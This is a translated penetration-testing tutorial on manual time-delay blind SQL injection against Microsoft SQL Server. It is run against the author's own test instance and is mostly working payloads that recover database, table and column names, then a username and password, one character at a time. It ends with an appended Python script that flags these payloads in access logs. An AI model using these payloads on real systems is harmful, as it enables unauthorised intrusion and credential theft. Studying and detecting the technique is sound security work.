
Microsoft SQL Server Manual Injection: Time-Delay-Based Blind Injection

Author: 渗透攻击红队
Published 2020-05-22 19:08:52
Column: 漏洞知识库

Introduction to delay-based injection

The delay function WAITFOR DELAY

WAITFOR is a flow-control statement provided by Transact-SQL in SQL Server. It pauses execution for a specified amount of time and then continues with the statements that follow. It takes a DELAY argument that specifies how long to wait.

If this statement is injected successfully, both the database's returned records and the web response are delayed by that amount of time. Because the statement involves no conditional logic, it is easy to inject successfully. By checking whether the web request is delayed, a penetration tester can determine whether the site has an injection vulnerability. And because the statement returns no specific content, it is also an important detection method for blind injection.

Syntax:

WAITFOR DELAY '0:0:n'

Example:

WAITFOR DELAY '0:0:4' -- delays for 4 seconds

The IF EXISTS () clause

Syntax:

IF exists () WAITFOR DELAY '0:0:5'

Manual time-delay injection

1. Check whether an injection point exists

WAITFOR DELAY '0:0:4'

2. Guess the database name

Check whether a database exists:

if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--

This statement checks whether the database with dbid=5 exists. If it does, the response is delayed by 3 seconds.

Guess the database name by dbid: first guess its length

if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--

My instance only has the two databases I created: test (dbid 5) and saulgoodman (dbid 6).

So I can use the statement above to check whether the name of dbid 5 is 4 characters long; if it is, the response is delayed by 3 seconds.

Likewise, the length of dbid 6 (saulgoodman) can be guessed with this statement:

if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--

If there are more databases, repeat the statements above for each dbid in the same way.

Query each database name character by character using its dbid

Since the database with dbid=5 is test, we can guess its name one character at a time:

-- Guess the first character: t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
-- Guess the second character: e
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
-- Guess the third character: s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
-- Guess the fourth character: t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),4,1)) = 116) WAITFOR DELAY '0:0:3'--

To query the dbid 6 database saulgoodman, just change the dbid number:

-- Guess the first character: s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
-- Guess the second character: a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
-- Guess the third character: u
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
-- Guess the fourth character: l
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
-- Guess the fifth character: g
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
-- Guess the sixth character: o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
-- Guess the seventh character: o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
-- Guess the eighth character: d
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
-- Guess the ninth character: m
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
-- Guess the tenth character: a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
-- Guess the eleventh character: n
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--

3. Guess table names

Now that we know the database name is test, we can use the following statement to check whether the first table name is 5 characters long (the table name is users):

if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--

As the screenshot showed, the page's response confirms that the table name is 5 characters long, so we can guess its characters one at a time: users

-- Guess the first character: u
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
-- Guess the second character: s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
-- Guess the third character: e
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
-- Guess the fourth character: r
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
-- Guess the fifth character: s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--

Knowing that the database is test and the first table is users, we can use the following statements to guess the characters of the second table name (the table name is info):

-- Guess the first character: i
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
-- Guess the second character: n
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
-- Guess the third character: f
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
-- Guess the fourth character: o
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--

4. Guess column names

Knowing that the table name is users, we can guess the column names of the users table (the column name is username):

-- Guess the first character: u
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
-- Guess the second character: s
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
-- Guess the third character: e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
-- Guess the fourth character: r
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
-- Guess the fifth character: n
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
-- Guess the sixth character: a
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
-- Guess the seventh character: m
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
-- Guess the eighth character: e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--

This recovers the first column name: username

Second method: the table has four columns: id, username, password, age

Get the first column (the column name is id):

-- Get the first character: i
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
-- Get the second character: d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--

Get the second column (the column name is username):

-- Get the first character: u
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
-- Get the second character: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
-- Get the third character: e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
-- Get the fourth character: r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
-- Get the fifth character: n
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
-- Get the sixth character: a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
-- Get the seventh character: m
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
-- Get the eighth character: e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--

Get the third column (the column name is password):

-- Get the first character: p
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
-- Get the second character: a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
-- Get the third character: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
-- Get the fourth character: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
-- Get the fifth character: w
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
-- Get the sixth character: o
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
-- Get the seventh character: r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
-- Get the eighth character: d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--

5. Guess the data character by character

Now that we know the table is users and the columns are username and password, we can start dumping data (the username is saul):

-- Check the first character of the username column: s
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
-- Check the second character of the username column: a
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
-- Check the third character of the username column: u
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
-- Check the fourth character of the username column: l
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--

This yields the first username: saul

Get saul's password (the password is saul520):

-- Check the first character of the password column: s
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
-- Check the second character of the password column: a
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
-- Check the third character of the password column: u
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
-- Check the fourth character of the password column: l
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
-- Check the fifth character of the password column: 5
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
-- Check the sixth character of the password column: 2
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
-- Check the seventh character of the password column: 0
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--
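From the defender's side, the whole walkthrough above has a recognisable footprint: every request carries WAITFOR DELAY, most reference sysdatabases, sysobjects or syscolumns, and the ones whose condition was true take about 3 seconds longer than the rest. The following script is an added example (not part of the original article): it URL-decodes access-log lines, matches those signatures, and counts per client how many flagged requests also hit the delay. The log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Assumed log format (constructed for this example): combined-style access log with
# the response time in seconds appended as the last field.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} \d+ ([\d.]+)$')

# Signatures drawn from the payloads above: WAITFOR DELAY itself, the catalogue views
# the walkthrough queries, and the ascii/unicode(substring(...)) character probe.
SIGNATURES = {
    "waitfor_delay": re.compile(r"waitfor\s+delay\s+'\d+:\d+:\d+'", re.I),
    "catalog_probe": re.compile(r"\b(?:sysdatabases|sysobjects|syscolumns)\b", re.I),
    "char_probe": re.compile(r"\b(?:ascii|unicode)\s*\(\s*substring\s*\(", re.I),
}

# Constructed sample traffic (not real logs): a plain request, a bare WAITFOR probe (4 s),
# a character guess whose condition was true (3 s), one whose condition was false, and
# an unrelated client.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/May/2020:19:08:52 +0800] "GET /item.aspx?id=1 HTTP/1.1" 200 512 0.012',
    '203.0.113.7 - - [22/May/2020:19:08:53 +0800] "GET /item.aspx?id=1%20WAITFOR%20DELAY%20%270:0:4%27 HTTP/1.1" 200 512 4.021',
    '203.0.113.7 - - [22/May/2020:19:08:58 +0800] "GET /item.aspx?id=1%20if%20(ascii(substring((select%20top%201%20name%20from%20master.dbo.sysdatabases%20where%20dbid%3D5),1,1))%20%3D%20116)%20WAITFOR%20DELAY%20%270:0:3%27-- HTTP/1.1" 200 512 3.008',
    '203.0.113.7 - - [22/May/2020:19:09:02 +0800] "GET /item.aspx?id=1%20if%20(ascii(substring((select%20top%201%20name%20from%20master.dbo.sysdatabases%20where%20dbid%3D5),1,1))%20%3D%20117)%20WAITFOR%20DELAY%20%270:0:3%27-- HTTP/1.1" 200 512 0.015',
    '198.51.100.2 - - [22/May/2020:19:09:03 +0800] "GET /item.aspx?id=2 HTTP/1.1" 200 640 0.010',
]

def decode_request(line):
    """Parse one line into (client_ip, URL-decoded request target, seconds), or None."""
    m = LOG_RE.match(line)
    return (m.group(1), unquote_plus(m.group(2)), float(m.group(3))) if m else None

def classify(target):
    """Names of the signatures that fire on a decoded request target."""
    return [name for name, rx in SIGNATURES.items() if rx.search(target)]

def analyze(lines, delay_threshold=2.5):
    """Per client: requests carrying injection signatures, and how many of those also
    took at least delay_threshold seconds (the injected condition evaluated true)."""
    report = {}
    for line in lines:
        parsed = decode_request(line)
        if parsed is None:
            continue  # line does not match the assumed format
        ip, target, seconds = parsed
        hits = classify(target)
        if not hits:
            continue
        entry = report.setdefault(ip, {"flagged": 0, "delayed": 0, "signatures": set()})
        entry["flagged"] += 1
        entry["signatures"].update(hits)
        if seconds >= delay_threshold:
            entry["delayed"] += 1
    return report
```

A client with many flagged requests where roughly half are delayed is the signature of a character-by-character search; the decoded requests also show exactly which catalogue objects were being read.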
This article is shared from the SaulGoodman WeChat official account; originally published 2020-04-03.